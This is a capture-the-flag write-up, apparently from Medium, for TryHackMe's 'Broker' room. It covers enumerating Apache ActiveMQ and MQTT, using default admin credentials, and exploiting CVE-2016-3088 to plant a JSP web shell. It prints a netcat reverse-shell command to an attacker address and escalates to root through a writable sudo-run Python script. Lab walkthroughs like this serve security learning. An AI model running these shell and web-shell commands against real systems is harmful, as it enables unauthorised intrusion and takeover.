Broker — TryHackMe

This is the write-up for TryHackMe’s room named Broker. Description says: Paul and Max found a way to chat at work by using a certain kind of software. They think they outsmarted their boss, but do not seem to know that eavesdropping is quite possible…They better be careful… Interesting.This room can be found here:

https://tryhackme.com/room/broker

As always let’s scan the target with NMAP to what is running on the target.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.160.160

┌──(kali㉿kali)-[/]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.160.160
PORT STATE SERVICE
22/tcp open ssh
1883/tcp open mqtt
8161/tcp open patrol-snmp
42449/tcp open unknown

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449 10.10.160.160

┌──(kali㉿kali)-[/]
└─$ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449 10.10.160.160

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
|_ 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
1883/tcp open mqtt?
8161/tcp open http Jetty 7.6.9.v20130131
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ
42449/tcp open tcpwrapped

Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up)

So from the above NMAP the required ports are: 1883,8161

What is the name of the software they use?

Again NMAP clearly shows the software used is ActiveMQ. Also port 8161 is running HTTP, so let’s check out this via the browser.

Yes it is indeed ActiveMQ. So lets brute force all the directories which might prove useful using ffuf.

FFUF

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.99.191:8161/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.99.191:8161/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
images [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 5968, Words: 2626, Lines: 134]
admin [Status: 401, Size: 1278, Words: 977, Lines: 33]
api [Status: 302, Size: 0, Words: 1, Lines: 1]
styles [Status: 302, Size: 0, Words: 1, Lines: 1]
[Status: 200, Size: 5968, Words: 2626, Lines: 134]
:: Progress: [882184/882184] :: Job [1/1] :: 987 req/sec :: Duration: [0:17:30] :: Errors: 0 ::

/admin looks interesting. Let’s access this page, but it asks for a username and password. Searching around found here that default credentials for Apache ActiveMQ Administration Console are just admin/admin. Tired them and it worked and also noticed a version number i.e. 5.9.0

Which videogame are Paul and Max talking about?

At this point it is clear that we need to talk to the daemon mqtt running on port 1883(check nmap scans). So searching for a mqtt client found this:

https://github.com/eclipse/paho.mqtt.python#getting-started

Also found this link very useful:

http://www.steves-internet-guide.com/into-mqtt-python-client/

But we still need a "topic” for subscribe() to subscribe to a topic and receive messages. This was found here:

http://10.10.120.228:8161/admin/xml/topics.jsp

So edited the code from GitHub link and added the topic,IP Address of the Target and the MQTT version which needed to be 3.1:

Ran the code as python3 mqtt_client.py

Voila! and we are able to see the chat between Paul and Max.Also found the Video game’s name in this chat. Great. Now we need to exploit some vulnerability in this version of ActiveMQ to move forward. Searchsploit revealed a vulnerability which was also applicable for 5.9.0.

Reading more info from this Metasploit module found a link to a CVE for the vulnerability:

https://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

For some reason the Metasploit module for exploration doesn't work so search around for any exploit available and found this one on GitHub:

https://github.com/gsheller/ActiveMQ_putshell-CVE-2016-3088

It was pretty simple to run:

python3 ActiveMQ_putshell.py -u http://10.10.120.228:8161

And this put a web shell at http://10.10.120.228:8161/admin/guo.jsp and used it like http://10.10.120.228:8161/admin/guo.jsp?pwd=gshell&shell=whoami to get the Remote Code Execution.

Reverse Shell

Now to gain a reverse shell tried few payload and this one worked which gave us a reverse. Note start a netcat listener on the attacking machine before executing the reverse shell payload URL and also replace the IP address with your own IP address:

nc 10.8.98.192 9999 -e /bin/sh

http://10.10.120.228:8161/admin/guo.jsp?pwd=gshell&shell=%27nc%2010.8.98.192%209999%20-e%20/bin/sh%27

Upgrade and Stabilize Shell
Run the following commands on the target to upgrade current shell:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

flag.txt

The flag was in the same directory where we got our reverse shell:

Privilege Escalation

Running sudo -l indicated that we can run subcribe.py in the /opt/apache-activemq-5.9.0 directory. Also on this file the current user activemq has write permissions.

So we can easily get root by adding the following code in subcribe.py using nano as vi was not available on the target:

import os
os.system("/bin/bash")

and then running it with sudo:

We are root and found the root flag at /root/root.txt

This was an interesting room and the spying on the chat part was a winner for me. If you like the write-up please clap and follow me.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

AWS SAVINGS PLANS AUTOMATION WITH PYTHON(BOTO3)

aws-conosle-aws-login-aws-savings-plan-aws-reserved-instances

2 ways to auto-generate documentation for Laravel APIs 📄⚙️

Day 34/100 Another late day at work…

Preparation of CKAD and CKA certification

The Basics of Threat Modeling (Part I)

My journey to learn Python — Day 2

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

HTB —Beep Writeup

TRYHACKME — Vulnerability Capstone

Zero Logon — CyberDefense Walkthrough

Tryhackme — Game Zone Writeup